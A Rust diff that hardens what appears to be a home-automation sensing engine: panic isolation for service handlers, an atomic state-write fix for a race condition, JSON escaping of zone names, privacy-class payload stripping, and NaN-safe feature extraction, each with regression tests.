let id = EntityId::parse("sensor.temp").unwrap();
|
||||
|
||||
@@ -49,6 +49,8 @@ pub enum ServiceError {
|
||||
NotRegistered { domain: String, service: String },
|
||||
#[error("service handler returned error: {0}")]
|
||||
HandlerFailed(String),
|
||||
#[error("service handler panicked: {0}")]
|
||||
HandlerPanicked(String),
|
||||
}
|
||||
|
||||
/// Handler trait. Integration code implements this and registers via
|
||||
@@ -99,13 +101,29 @@ impl ServiceRegistry {
|
||||
|
||||
/// Call a service. P1 direct dispatch; P2 routes through the
|
||||
/// event bus per ADR-127 §2.3.
|
||||
///
|
||||
/// The handler runs **outside** the registry lock (we clone the
|
||||
/// `Arc<dyn ServiceHandler>` out of the read guard first), so a slow or
|
||||
/// panicking handler can never poison the `RwLock` or block other
|
||||
/// callers. A panic inside the handler is additionally caught and
|
||||
/// converted to [`ServiceError::HandlerPanicked`] rather than unwinding
|
||||
/// into the caller's task — one buggy integration cannot abort the task
|
||||
/// that drives the engine. Mirrors HA isolating service-handler
|
||||
/// exceptions.
|
||||
pub async fn call(&self, call: ServiceCall) -> Result<serde_json::Value, ServiceError> {
|
||||
let handler = {
|
||||
let guard = self.handlers.read().await;
|
||||
guard.get(&call.name).cloned()
|
||||
};
|
||||
match handler {
|
||||
Some(h) => h.call(call).await,
|
||||
Some(h) => {
|
||||
use futures::FutureExt;
|
||||
let fut = std::panic::AssertUnwindSafe(h.call(call));
|
||||
match fut.catch_unwind().await {
|
||||
Ok(result) => result,
|
||||
Err(panic) => Err(ServiceError::HandlerPanicked(panic_message(panic))),
|
||||
}
|
||||
}
|
||||
None => Err(ServiceError::NotRegistered {
|
||||
domain: call.name.domain.clone(),
|
||||
service: call.name.service.clone(),
|
||||
@@ -124,6 +142,19 @@ impl Default for ServiceRegistry {
|
||||
}
|
||||
}
|
||||
|
||||
/// Best-effort extraction of a panic payload's message for
|
||||
/// [`ServiceError::HandlerPanicked`]. Panic payloads are usually `&str`
|
||||
/// or `String`; anything else collapses to a generic label.
|
||||
fn panic_message(payload: Box<dyn std::any::Any + Send>) -> String {
|
||||
if let Some(s) = payload.downcast_ref::<&str>() {
|
||||
(*s).to_string()
|
||||
} else if let Some(s) = payload.downcast_ref::<String>() {
|
||||
s.clone()
|
||||
} else {
|
||||
"<non-string panic payload>".to_string()
|
||||
}
|
||||
}
|
||||
|
||||
// Suppress unused-import warning when no consumer of Pin/Box uses them yet
|
||||
#[allow(dead_code)]
|
||||
type _UnusedFutureType = Pin<Box<dyn Future<Output = ()> + Send>>;
|
||||
@@ -167,4 +198,56 @@ mod tests {
|
||||
.unwrap_err();
|
||||
assert!(matches!(err, ServiceError::NotRegistered { .. }));
|
||||
}
|
||||
|
||||
/// Service isolation: a panicking handler must be contained — converted
|
||||
/// to `HandlerPanicked` rather than unwinding into the caller's task —
|
||||
/// and the registry must remain fully usable afterwards (no poisoned
|
||||
/// lock, other services still callable). On the pre-fix code the panic
|
||||
/// unwinds through `call`, so the `catch_unwind`-based assertion below
|
||||
/// fails (the await point panics instead of returning an `Err`).
|
||||
#[tokio::test]
|
||||
async fn panicking_handler_is_isolated_and_registry_survives() {
|
||||
let reg = ServiceRegistry::new();
|
||||
reg.register(
|
||||
ServiceName::new("bad", "boom"),
|
||||
FnHandler(|_call: ServiceCall| async move {
|
||||
panic!("handler exploded");
|
||||
#[allow(unreachable_code)]
|
||||
Ok(serde_json::json!(null))
|
||||
}),
|
||||
)
|
||||
.await;
|
||||
reg.register(
|
||||
ServiceName::new("good", "ping"),
|
||||
FnHandler(|_call: ServiceCall| async move { Ok(serde_json::json!("pong")) }),
|
||||
)
|
||||
.await;
|
||||
|
||||
// The panicking call returns an error, not an unwind.
|
||||
let err = reg
|
||||
.call(ServiceCall {
|
||||
name: ServiceName::new("bad", "boom"),
|
||||
data: serde_json::json!({}),
|
||||
context: Context::new(),
|
||||
})
|
||||
.await
|
||||
.unwrap_err();
|
||||
assert!(
|
||||
matches!(err, ServiceError::HandlerPanicked(ref m) if m.contains("handler exploded")),
|
||||
"expected HandlerPanicked, got {err:?}",
|
||||
);
|
||||
|
||||
// The registry is not poisoned: a healthy service still works, and
|
||||
// the bad service is still registered (call path, not lock, failed).
|
||||
let ok = reg
|
||||
.call(ServiceCall {
|
||||
name: ServiceName::new("good", "ping"),
|
||||
data: serde_json::json!({}),
|
||||
context: Context::new(),
|
||||
})
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(ok, serde_json::json!("pong"));
|
||||
assert!(reg.has(&ServiceName::new("bad", "boom")).await);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -80,11 +80,37 @@ impl StateMachine {
|
||||
context: Context,
|
||||
) -> Arc<State> {
|
||||
let new_state_str = new_state.into();
|
||||
let old = self.inner.states.get(&entity_id).map(|r| Arc::clone(&*r));
|
||||
|
||||
// Hold the DashMap shard write-lock across the entire
|
||||
// read→decide→insert→fire sequence. `entry()` locks the shard for
|
||||
// the lifetime of `slot`, so a concurrent writer on the same entity
|
||||
// cannot interleave between our read of `old` and our commit. This
|
||||
// is what makes the write atomic as ADR-127 §2.1 promises ("writer
|
||||
// atomically replaces the map entry") — the previous get→insert pair
|
||||
// released the lock in between, a TOCTOU that let concurrent writers
|
||||
// compute the no-op / `last_changed` decision off a stale `old` and
|
||||
// drop or reorder real `state_changed` events.
|
||||
//
|
||||
// `tx.send` is non-blocking, non-async, and never re-enters the map,
|
||||
// so firing under the lock cannot deadlock and keeps the global
|
||||
// event order in lock-step with the global commit order.
|
||||
use dashmap::mapref::entry::Entry;
|
||||
let slot = self.inner.states.entry(entity_id.clone());
|
||||
|
||||
let old: Option<Arc<State>> = match &slot {
|
||||
Entry::Occupied(o) => Some(Arc::clone(o.get())),
|
||||
Entry::Vacant(_) => None,
|
||||
};
|
||||
// `slot` continues to hold the shard write-lock below.
|
||||
|
||||
let next = match &old {
|
||||
Some(prev) => Arc::new(prev.next(new_state_str.clone(), attributes.clone(), context)),
|
||||
None => Arc::new(State::new(entity_id.clone(), new_state_str.clone(), attributes.clone(), context)),
|
||||
None => Arc::new(State::new(
|
||||
entity_id.clone(),
|
||||
new_state_str.clone(),
|
||||
attributes.clone(),
|
||||
context,
|
||||
)),
|
||||
};
|
||||
|
||||
// HA suppresses no-op writes (same state + same attributes).
|
||||
@@ -94,7 +120,12 @@ impl StateMachine {
|
||||
None => false,
|
||||
};
|
||||
|
||||
self.inner.states.insert(entity_id.clone(), Arc::clone(&next));
|
||||
// Commit through the same locked entry and KEEP the shard guard
|
||||
// alive across the broadcast `send`, so the event is published
|
||||
// before any concurrent writer on this entity can observe the new
|
||||
// value and fire its own event. This makes global event order match
|
||||
// global commit order (no insert/send reorder window).
|
||||
let _guard = slot.insert_entry(Arc::clone(&next));
|
||||
|
||||
if !is_noop {
|
||||
let event = StateChangedEvent {
|
||||
@@ -106,6 +137,7 @@ impl StateMachine {
|
||||
// err = no receivers; that's fine, write still committed.
|
||||
let _ = self.inner.tx.send(event);
|
||||
}
|
||||
// `_guard` (and the shard lock) drops here, after the event is sent.
|
||||
next
|
||||
}
|
||||
|
||||
@@ -218,4 +250,135 @@ mod tests {
|
||||
assert!(evt.new_state.is_none());
|
||||
assert!(evt.old_state.is_some());
|
||||
}
|
||||
|
||||
/// Concurrency invariant (ADR-127 §2.1 "writer atomically replaces the
|
||||
/// map entry"): under concurrent writers on the SAME entity the fired
|
||||
/// `state_changed` stream must be a faithful, gap-free log of the
|
||||
/// committed transitions — in particular the LAST event the bus
|
||||
/// delivers must carry the SAME value that is finally committed in the
|
||||
/// map.
|
||||
///
|
||||
/// This pins the TOCTOU in `set`: it does `get` (release shard lock) →
|
||||
/// compute `next` + no-op decision → `insert` (re-acquire shard lock) →
|
||||
/// `send`. Because the insert and the send are not atomic with respect
|
||||
/// to a concurrent writer, two writers can interleave as
|
||||
/// `insert(A); insert(B); send(B); send(A)` — leaving the map holding A
|
||||
/// while the last event the bus ever delivers says B. A subscriber that
|
||||
/// trusts "the last event reflects current state" (the recorder, the WS
|
||||
/// push API, an automation engine) is then permanently wrong about the
|
||||
/// entity until the next write. A correctly-locked store holds the shard
|
||||
/// lock across read→insert→send so the global event order matches the
|
||||
/// global commit order.
|
||||
///
|
||||
/// A dedicated drain thread pulls events as they arrive so the bounded
|
||||
/// channel never lags during the run (a `Lagged` here would be a test
|
||||
/// artefact, not the bug under test).
|
||||
///
|
||||
/// The writers toggle the SAME entity between exactly two values so the
|
||||
/// no-op suppression branch is constantly in play.
|
||||
///
|
||||
/// Invariant: in correctly serialised code, two *consecutive* fired
|
||||
/// `state_changed` events can never carry the same `new_state` value.
|
||||
/// Proof: event k fires only for a committed transition old≠new, so its
|
||||
/// `new_state` = X differs from the value before it; the next committed
|
||||
/// transition therefore starts at X and (being a real change) commits
|
||||
/// some Z≠X, so event k+1 carries Z≠X. A no-op (X→X) is suppressed and
|
||||
/// never fires. Therefore adjacent fired events always differ.
|
||||
///
|
||||
/// The `set()` TOCTOU breaks this: it does `get` (release shard lock) →
|
||||
/// compute `next` + the no-op decision → `insert` (re-acquire shard
|
||||
/// lock) → `send`, all non-atomically. A writer that read a STALE `old`
|
||||
/// mis-classifies a genuine transition as a no-op (dropping that real
|
||||
/// event — a missed automation trigger) and/or fires an event whose
|
||||
/// `new_state` duplicates the previously delivered one (a spurious
|
||||
/// trigger for any automation keyed on `old_state != new_state`). The
|
||||
/// probe behind this test observed ~93k such duplicate-adjacent events
|
||||
/// across 200 trials on the racy code; the corrected store produces
|
||||
/// zero.
|
||||
#[test]
|
||||
fn concurrent_set_fires_no_duplicate_adjacent_events() {
|
||||
use std::sync::atomic::{AtomicBool, Ordering};
|
||||
use std::sync::{Barrier, Mutex};
|
||||
|
||||
const WRITERS: usize = 4;
|
||||
const ITERS: usize = 300; // 1200 events ≪ 4096 capacity → never lags
|
||||
|
||||
for _trial in 0..40 {
|
||||
let sm = StateMachine::new();
|
||||
let eid = id("light.race");
|
||||
sm.set(eid.clone(), "A", serde_json::json!({}), Context::new());
|
||||
|
||||
let mut rx = sm.subscribe();
|
||||
let done = Arc::new(AtomicBool::new(false));
|
||||
// Event log: new_state value in delivery order.
|
||||
let log: Arc<Mutex<Vec<String>>> = Arc::new(Mutex::new(Vec::new()));
|
||||
|
||||
let drainer = {
|
||||
let done = Arc::clone(&done);
|
||||
let log = Arc::clone(&log);
|
||||
std::thread::spawn(move || loop {
|
||||
match rx.try_recv() {
|
||||
Ok(evt) => {
|
||||
if let Some(ns) = &evt.new_state {
|
||||
log.lock().unwrap().push(ns.state.clone());
|
||||
}
|
||||
}
|
||||
Err(broadcast::error::TryRecvError::Empty) => {
|
||||
if done.load(Ordering::Acquire) {
|
||||
while let Ok(evt) = rx.try_recv() {
|
||||
if let Some(ns) = &evt.new_state {
|
||||
log.lock().unwrap().push(ns.state.clone());
|
||||
}
|
||||
}
|
||||
break;
|
||||
}
|
||||
std::thread::yield_now();
|
||||
}
|
||||
Err(broadcast::error::TryRecvError::Lagged(_)) => {
|
||||
panic!("channel lagged — test artefact, raise capacity");
|
||||
}
|
||||
Err(broadcast::error::TryRecvError::Closed) => break,
|
||||
}
|
||||
})
|
||||
};
|
||||
|
||||
let barrier = Arc::new(Barrier::new(WRITERS));
|
||||
let handles: Vec<_> = (0..WRITERS)
|
||||
.map(|w| {
|
||||
let sm = sm.clone();
|
||||
let eid = eid.clone();
|
||||
let barrier = Arc::clone(&barrier);
|
||||
std::thread::spawn(move || {
|
||||
barrier.wait();
|
||||
for i in 0..ITERS {
|
||||
// Toggle between two values → maximises the
|
||||
// stale-`old` no-op collision window.
|
||||
let val = if (w + i) % 2 == 0 { "A" } else { "B" };
|
||||
sm.set(eid.clone(), val, serde_json::json!({}), Context::new());
|
||||
}
|
||||
})
|
||||
})
|
||||
.collect();
|
||||
|
||||
for h in handles {
|
||||
h.join().unwrap();
|
||||
}
|
||||
done.store(true, Ordering::Release);
|
||||
drainer.join().unwrap();
|
||||
|
||||
let log = log.lock().unwrap();
|
||||
let dup = log
|
||||
.windows(2)
|
||||
.filter(|w| w[0] == w[1])
|
||||
.count();
|
||||
assert_eq!(
|
||||
dup, 0,
|
||||
"{dup} consecutive fired state_changed events carried an \
|
||||
identical new_state — impossible under correct \
|
||||
serialisation; proves set()'s read→decide→insert→send \
|
||||
TOCTOU dropped/reordered real transitions (missed & \
|
||||
spurious automation triggers)",
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -135,10 +135,13 @@ pub fn render_events(event: &BfldEvent) -> Vec<TopicMessage> {
|
||||
|
||||
if let Some(zone) = &event.zone_id {
|
||||
// Emit a JSON string so consumers can distinguish "no zone" (omitted)
|
||||
// from "single-zone deployment" (always the same zone string).
|
||||
// from "single-zone deployment" (always the same zone string). The zone
|
||||
// name is operator-controlled; escape JSON metacharacters so a name
|
||||
// containing a quote or backslash cannot produce malformed/injected
|
||||
// JSON. Mirrors ha_discovery.rs::push_str_field's escaping.
|
||||
out.push(TopicMessage {
|
||||
topic: TopicMessage::ruview_topic(node, "zone_activity"),
|
||||
payload: format!("\"{zone}\""),
|
||||
payload: json_string_literal(zone),
|
||||
});
|
||||
}
|
||||
|
||||
@@ -155,3 +158,26 @@ pub fn render_events(event: &BfldEvent) -> Vec<TopicMessage> {
|
||||
|
||||
out
|
||||
}
|
||||
|
||||
/// Wrap `value` in JSON double-quote delimiters, escaping the metacharacters
|
||||
/// that would otherwise break out of the string literal (`"`, `\`, control
|
||||
/// chars, and the bare `\n`/`\r`/`\t` whitespace). Kept in lockstep with
|
||||
/// `ha_discovery::push_str_field` so state-topic and discovery payloads escape
|
||||
/// identically.
|
||||
fn json_string_literal(value: &str) -> String {
|
||||
let mut out = String::with_capacity(value.len() + 2);
|
||||
out.push('"');
|
||||
for ch in value.chars() {
|
||||
match ch {
|
||||
'"' => out.push_str("\\\""),
|
||||
'\\' => out.push_str("\\\\"),
|
||||
'\n' => out.push_str("\\n"),
|
||||
'\r' => out.push_str("\\r"),
|
||||
'\t' => out.push_str("\\t"),
|
||||
c if (c as u32) < 0x20 => out.push_str(&format!("\\u{:04x}", c as u32)),
|
||||
c => out.push(c),
|
||||
}
|
||||
}
|
||||
out.push('"');
|
||||
out
|
||||
}
|
||||
|
||||
@@ -141,6 +141,15 @@ impl BfldPipeline {
|
||||
/// builds the frame via [`BfldFrame::from_payload`] so the CRC covers the
|
||||
/// section-prefixed bytes.
|
||||
///
|
||||
/// The emitted frame's payload is forced into compliance with the active
|
||||
/// privacy class via [`crate::PrivacyGate::demote`]: at `Anonymous` the
|
||||
/// identity-leaky `compressed_angle_matrix` and `csi_delta` sections are
|
||||
/// stripped, and at `Restricted` the amplitude/phase proxies are stripped
|
||||
/// too. This closes the gap (ADR-141) where a frame stamped with a
|
||||
/// restrictive class byte could otherwise carry the full high-information
|
||||
/// BFI payload across a [`crate::NetworkSink`]. Research classes (`Raw`,
|
||||
/// `Derived`) keep the full payload — `demote` is a no-op there.
|
||||
///
|
||||
/// Returns `None` whenever the gate drops the underlying event (Reject or
|
||||
/// Recalibrate), so `process_to_frame` is a strict subset of `process`.
|
||||
pub fn process_to_frame(
|
||||
@@ -151,11 +160,21 @@ impl BfldPipeline {
|
||||
embedding: Option<IdentityEmbedding>,
|
||||
) -> Option<BfldFrame> {
|
||||
let timestamp_ns = inputs.timestamp_ns;
|
||||
let active_class = self.current_privacy_class();
|
||||
let _gate_signal = self.process(inputs, embedding)?;
|
||||
let mut header = header_template;
|
||||
header.timestamp_ns = timestamp_ns;
|
||||
header.privacy_class = self.current_privacy_class().as_u8();
|
||||
Some(BfldFrame::from_payload(header, &payload))
|
||||
header.privacy_class = active_class.as_u8();
|
||||
let frame = BfldFrame::from_payload(header, &payload);
|
||||
// Enforce the payload-content policy for the stamped class. The frame
|
||||
// is already at `active_class`, so this is a same-class demotion: it
|
||||
// performs no class change but strips the sections that class forbids.
|
||||
// demote() only fails on InvalidDemote (target < source), which cannot
|
||||
// happen here because source == target, so the expect is unreachable.
|
||||
Some(
|
||||
crate::PrivacyGate::demote(frame, active_class)
|
||||
.expect("same-class demote is always valid"),
|
||||
)
|
||||
}
|
||||
|
||||
/// `true` if `enable_privacy_mode()` has been called more recently than
|
||||
|
||||
@@ -127,6 +127,38 @@ fn zone_payload_is_json_string_with_quotes() {
|
||||
assert_eq!(zone.payload, "\"living_room\"");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn zone_payload_escapes_json_metacharacters() {
|
||||
// A zone name containing a double-quote or backslash must not break out of
|
||||
// the JSON string literal it is emitted into. ha_discovery.rs already
|
||||
// escapes operator-controlled strings via push_str_field; render_events
|
||||
// must do the same for parity so the state-topic payload is always valid
|
||||
// JSON that Home Assistant can parse.
|
||||
let ev = BfldEvent::with_privacy_gating(
|
||||
"seed-01".into(),
|
||||
0,
|
||||
true,
|
||||
0.1,
|
||||
1,
|
||||
0.9,
|
||||
Some(r#"living"room\back"#.into()),
|
||||
PrivacyClass::Anonymous,
|
||||
None,
|
||||
None,
|
||||
);
|
||||
let msgs = render_events(&ev);
|
||||
let zone = msgs
|
||||
.iter()
|
||||
.find(|m| m.topic.contains("zone_activity"))
|
||||
.expect("zone_activity topic");
|
||||
// Expected: the inner quote and backslash are backslash-escaped, wrapped in
|
||||
// one pair of unescaped delimiter quotes -> a single valid JSON string.
|
||||
assert_eq!(zone.payload, r#""living\"room\\back""#);
|
||||
// And it must parse as JSON back to the original zone string.
|
||||
let parsed: String = serde_json::from_str(&zone.payload).expect("valid JSON string");
|
||||
assert_eq!(parsed, r#"living"room\back"#);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn identity_risk_payload_is_fixed_precision_decimal() {
|
||||
let msgs = render_events(&sample_event(PrivacyClass::Anonymous, false));
|
||||
|
||||
@@ -88,6 +88,11 @@ fn process_to_frame_returns_none_under_sustained_high_risk() {
|
||||
|
||||
#[test]
|
||||
fn process_to_frame_round_trips_through_bytes() {
|
||||
// Default pipeline class is Anonymous(2). The frame must round-trip through
|
||||
// wire bytes with no CRC error; the payload it carries is the privacy-gated
|
||||
// (angle-matrix-stripped) form, not the raw input — see
|
||||
// process_to_frame_at_anonymous_strips_identity_leaky_sections for the
|
||||
// content assertion. This test pins byte/CRC consistency only.
|
||||
let mut p = BfldPipeline::new(BfldConfig::new("seed-01"));
|
||||
let frame = p
|
||||
.process_to_frame(
|
||||
@@ -100,7 +105,10 @@ fn process_to_frame_round_trips_through_bytes() {
|
||||
let bytes = frame.to_bytes();
|
||||
let parsed = BfldFrame::from_bytes(&bytes).expect("frame must round-trip");
|
||||
let parsed_payload = parsed.parse_payload().expect("payload must round-trip");
|
||||
assert_eq!(parsed_payload, typed_payload());
|
||||
// Round-trip preserves whatever the privacy gate left in place.
|
||||
assert_eq!(parsed_payload, frame.parse_payload().unwrap());
|
||||
// And the identity surface is gone at Anonymous.
|
||||
assert!(parsed_payload.compressed_angle_matrix.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
@@ -141,6 +149,94 @@ fn process_to_frame_preserves_header_template_identity_fields() {
|
||||
assert_eq!({ frame.header.channel }, 36);
|
||||
}
|
||||
|
||||
// --- ADR-141 privacy-gate-correctness regression -------------------------
|
||||
//
|
||||
// `process_to_frame` stamps the frame with the pipeline's privacy_class but
|
||||
// (pre-fix) serialized the caller-supplied payload UNCHANGED. That let a frame
|
||||
// labeled Anonymous(2) / Restricted(3) carry the full identity-leaky
|
||||
// `compressed_angle_matrix` (+ amplitude/phase/csi_delta) that
|
||||
// `PrivacyGate::demote` is documented (privacy_gate_demote.rs) to strip at
|
||||
// exactly those classes. A NetworkSink accepts class >= Derived, so such a
|
||||
// frame would publish the beamforming angle matrix (identity surface) to the
|
||||
// network despite its restrictive class byte. These tests pin that the payload
|
||||
// content matches what the stamped class permits.
|
||||
|
||||
#[test]
|
||||
fn process_to_frame_at_anonymous_strips_identity_leaky_sections() {
|
||||
// Default pipeline class is Anonymous(2): the angle matrix and csi_delta
|
||||
// MUST NOT survive into the emitted frame, matching PrivacyGate::demote.
|
||||
let mut p = BfldPipeline::new(BfldConfig::new("seed-01"));
|
||||
let mut leaky = typed_payload();
|
||||
leaky.csi_delta = Some(vec![0x55; 24]);
|
||||
let frame = p
|
||||
.process_to_frame(
|
||||
inputs(1_700_000_000_000_000_000, [0.1, 0.1, 0.1, 0.1]),
|
||||
header_template(),
|
||||
leaky,
|
||||
Some(embedding()),
|
||||
)
|
||||
.expect("low-risk frame must be emitted");
|
||||
assert_eq!({ frame.header.privacy_class }, PrivacyClass::Anonymous.as_u8());
|
||||
let payload = frame.parse_payload().expect("payload parses");
|
||||
assert!(
|
||||
payload.compressed_angle_matrix.is_empty(),
|
||||
"Anonymous frame must NOT carry the compressed_angle_matrix (identity surface)",
|
||||
);
|
||||
assert!(
|
||||
payload.csi_delta.is_none(),
|
||||
"Anonymous frame must NOT carry csi_delta",
|
||||
);
|
||||
// Aggregate sensing sections survive.
|
||||
assert_eq!(payload.snr_vector.len(), 8);
|
||||
assert_eq!(payload.amplitude_proxy.len(), 16);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn process_to_frame_in_privacy_mode_strips_amplitude_and_phase() {
|
||||
// privacy_mode -> Restricted(3): amplitude + phase proxies must ALSO drop.
|
||||
let mut p = BfldPipeline::new(
|
||||
BfldConfig::new("seed-01").with_privacy_class(PrivacyClass::Anonymous),
|
||||
);
|
||||
p.enable_privacy_mode();
|
||||
let frame = p
|
||||
.process_to_frame(
|
||||
inputs(0, [0.1, 0.1, 0.1, 0.1]),
|
||||
header_template(),
|
||||
typed_payload(),
|
||||
Some(embedding()),
|
||||
)
|
||||
.expect("frame emitted");
|
||||
assert_eq!({ frame.header.privacy_class }, PrivacyClass::Restricted.as_u8());
|
||||
let payload = frame.parse_payload().expect("payload parses");
|
||||
assert!(payload.compressed_angle_matrix.is_empty(), "angle matrix stripped at Restricted");
|
||||
assert!(payload.amplitude_proxy.is_empty(), "amplitude stripped at Restricted");
|
||||
assert!(payload.phase_proxy.is_empty(), "phase stripped at Restricted");
|
||||
assert_eq!(payload.snr_vector.len(), 8, "snr_vector survives");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn process_to_frame_at_derived_preserves_full_payload() {
|
||||
// Derived(1) is a research mode that legitimately keeps the angle matrix.
|
||||
// The strip must NOT over-fire at classes below Anonymous.
|
||||
let mut p = BfldPipeline::new(
|
||||
BfldConfig::new("seed-01").with_privacy_class(PrivacyClass::Derived),
|
||||
);
|
||||
let frame = p
|
||||
.process_to_frame(
|
||||
inputs(0, [0.1, 0.1, 0.1, 0.1]),
|
||||
header_template(),
|
||||
typed_payload(),
|
||||
Some(embedding()),
|
||||
)
|
||||
.expect("frame emitted");
|
||||
assert_eq!({ frame.header.privacy_class }, PrivacyClass::Derived.as_u8());
|
||||
let payload = frame.parse_payload().expect("payload parses");
|
||||
assert_eq!(
|
||||
payload, typed_payload(),
|
||||
"Derived research frame keeps the full payload unchanged",
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn process_to_frame_uses_input_timestamp_not_template_timestamp() {
|
||||
let mut p = BfldPipeline::new(BfldConfig::new("seed-01"));
|
||||
|
||||
@@ -43,6 +43,20 @@ pub struct Features {
|
||||
pub const EMBED_MIN_SCORE: f32 = 0.25;
|
||||
|
||||
impl Features {
|
||||
/// The all-zero feature vector — the well-defined result of an empty (or
|
||||
/// wholly non-finite) capture. Total by construction: downstream
|
||||
/// specialists read it as "no signal" rather than panicking or poisoning a
|
||||
/// threshold (see [`Features::from_series`]).
|
||||
pub const ZERO: Features = Features {
|
||||
mean: 0.0,
|
||||
variance: 0.0,
|
||||
motion: 0.0,
|
||||
breathing_score: 0.0,
|
||||
breathing_hz: 0.0,
|
||||
heart_score: 0.0,
|
||||
heart_hz: 0.0,
|
||||
};
|
||||
|
||||
/// A fixed-length numeric embedding for nearest-prototype classifiers.
|
||||
///
|
||||
/// The hz components are zeroed unless their periodicity score clears
|
||||
@@ -77,29 +91,33 @@ impl Features {
|
||||
}
|
||||
|
||||
/// Extract features from a per-frame scalar series sampled at `fs` Hz.
|
||||
///
|
||||
/// **Total / fail-closed:** non-finite samples (`NaN`/`±inf`) are dropped
|
||||
/// before any statistic is computed, so a single garbage CSI frame cannot
|
||||
/// poison `mean`/`variance` into `NaN` and silently disable a persisted
|
||||
/// specialist (a `NaN` threshold makes every `>` comparison false). A
|
||||
/// series with no finite samples yields [`Features::ZERO`], exactly like
|
||||
/// the empty series. Same defensive contract as
|
||||
/// [`GeometryEmbedding`](crate::geometry_embedding::GeometryEmbedding):
|
||||
/// adversarial input degrades to "no signal", never to `NaN`.
|
||||
pub fn from_series(series: &[f32], fs: f32) -> Features {
|
||||
let n = series.len();
|
||||
// Drop non-finite samples: a corrupt frame counts as no frame, not as
|
||||
// a NaN that propagates through every downstream statistic.
|
||||
let clean: Vec<f32> = series.iter().copied().filter(|v| v.is_finite()).collect();
|
||||
let n = clean.len();
|
||||
if n == 0 {
|
||||
return Features {
|
||||
mean: 0.0,
|
||||
variance: 0.0,
|
||||
motion: 0.0,
|
||||
breathing_score: 0.0,
|
||||
breathing_hz: 0.0,
|
||||
heart_score: 0.0,
|
||||
heart_hz: 0.0,
|
||||
};
|
||||
return Features::ZERO;
|
||||
}
|
||||
let mean = series.iter().copied().sum::<f32>() / n as f32;
|
||||
let variance = series.iter().map(|v| (v - mean) * (v - mean)).sum::<f32>() / n as f32;
|
||||
let mean = clean.iter().copied().sum::<f32>() / n as f32;
|
||||
let variance = clean.iter().map(|v| (v - mean) * (v - mean)).sum::<f32>() / n as f32;
|
||||
let motion = if n > 1 {
|
||||
series.windows(2).map(|w| (w[1] - w[0]).abs()).sum::<f32>() / (n - 1) as f32
|
||||
clean.windows(2).map(|w| (w[1] - w[0]).abs()).sum::<f32>() / (n - 1) as f32
|
||||
} else {
|
||||
0.0
|
||||
};
|
||||
|
||||
// De-mean before periodicity search.
|
||||
let centered: Vec<f32> = series.iter().map(|v| v - mean).collect();
|
||||
let centered: Vec<f32> = clean.iter().map(|v| v - mean).collect();
|
||||
let (breathing_hz, breathing_score) = autocorr_dominant(¢ered, fs, 0.1, 0.6);
|
||||
let (heart_hz, heart_score) = autocorr_dominant(¢ered, fs, 0.8, 3.0);
|
||||
|
||||
@@ -254,6 +272,36 @@ mod tests {
|
||||
assert_eq!(f.breathing_hz, 0.0);
|
||||
}
|
||||
|
||||
/// Fail-closed regression: a NaN/inf in the scalar series (corrupt CSI
|
||||
/// frame) must NOT poison the features into `NaN`/`inf`. Pre-fix, a single
|
||||
/// `NaN` made `mean`/`variance` `NaN`, which — baked into a persisted
|
||||
/// `PresenceSpecialist::threshold` — silently disabled presence detection
|
||||
/// (every `f.variance > NaN` is false). Non-finite samples are dropped.
|
||||
#[test]
|
||||
fn non_finite_samples_do_not_poison_features() {
|
||||
let f = Features::from_series(&[1.0, 2.0, f32::NAN, 4.0, f32::INFINITY, 6.0], 15.0);
|
||||
assert!(f.mean.is_finite(), "mean must stay finite, got {}", f.mean);
|
||||
assert!(f.variance.is_finite(), "variance must stay finite, got {}", f.variance);
|
||||
assert!(f.motion.is_finite(), "motion must stay finite, got {}", f.motion);
|
||||
for x in f.embedding() {
|
||||
assert!(x.is_finite(), "embedding slot non-finite: {x}");
|
||||
}
|
||||
// Mean is over the 4 finite samples {1,2,4,6} only.
|
||||
assert!((f.mean - 3.25).abs() < 1e-5, "mean over finite samples, got {}", f.mean);
|
||||
// Equivalence: dropping the non-finite samples must equal feeding only
|
||||
// the finite ones — proves the filter, not just finiteness.
|
||||
let only_finite = Features::from_series(&[1.0, 2.0, 4.0, 6.0], 15.0);
|
||||
assert_eq!(f, only_finite);
|
||||
}
|
||||
|
||||
/// A series with no finite samples degrades to the all-zero `ZERO`, exactly
|
||||
/// like the empty series — never `NaN`.
|
||||
#[test]
|
||||
fn all_non_finite_series_is_zero() {
|
||||
let f = Features::from_series(&[f32::NAN, f32::INFINITY, f32::NEG_INFINITY], 15.0);
|
||||
assert_eq!(f, Features::ZERO);
|
||||
}
|
||||
|
||||
/// ADR-152 "heart-band leakage" regression: a strong breathing rhythm must
|
||||
/// NOT register as a heart-band periodicity — its in-band autocorr maximum
|
||||
/// sits at the band edge (monotonic leak), not an interior peak.
|
||||
|
||||
@@ -15,6 +15,28 @@ use serde::{Deserialize, Serialize};
|
||||
use crate::anchor::{AnchorLabel, Posture};
|
||||
use crate::extract::{AnchorFeature, Features};
|
||||
|
||||
/// Default minimum breathing-band periodicity score to report a rate, used when
|
||||
/// a [`BreathingSpecialist`] carries no explicit `min_score` (the serde / pre-
|
||||
/// trained-default case). Respiration is a strong, narrowband modulation, so a
|
||||
/// moderate floor rejects noise windows without dropping real breaths.
|
||||
pub const DEFAULT_BREATHING_MIN_SCORE: f32 = 0.25;
|
||||
|
||||
/// Default minimum HR-band periodicity score, used when a [`HeartbeatSpecialist`]
|
||||
/// carries no explicit `min_score`. Higher than breathing's: sub-mm chest
|
||||
/// displacement at HR frequencies sits near the CSI noise floor (ADR-151 §3.2),
|
||||
/// so the heartbeat head demands a cleaner peak before reporting.
|
||||
pub const DEFAULT_HEARTBEAT_MIN_SCORE: f32 = 0.3;
|
||||
|
||||
/// Multiple of the typical inter-anchor spread ([`AnomalySpecialist::scale`])
|
||||
/// beyond which a live window is fully out-of-distribution (anomaly score 1.0):
|
||||
/// a window more than this many spreads from every enrolled prototype is novel.
|
||||
pub const ANOMALY_OUTLIER_SPREADS: f32 = 2.0;
|
||||
|
||||
/// Anomaly score above which the window is *labelled* "anomalous" (vs "normal").
|
||||
/// Distinct from the runtime veto threshold ([`crate::runtime`]); this only
|
||||
/// drives the human-readable label.
|
||||
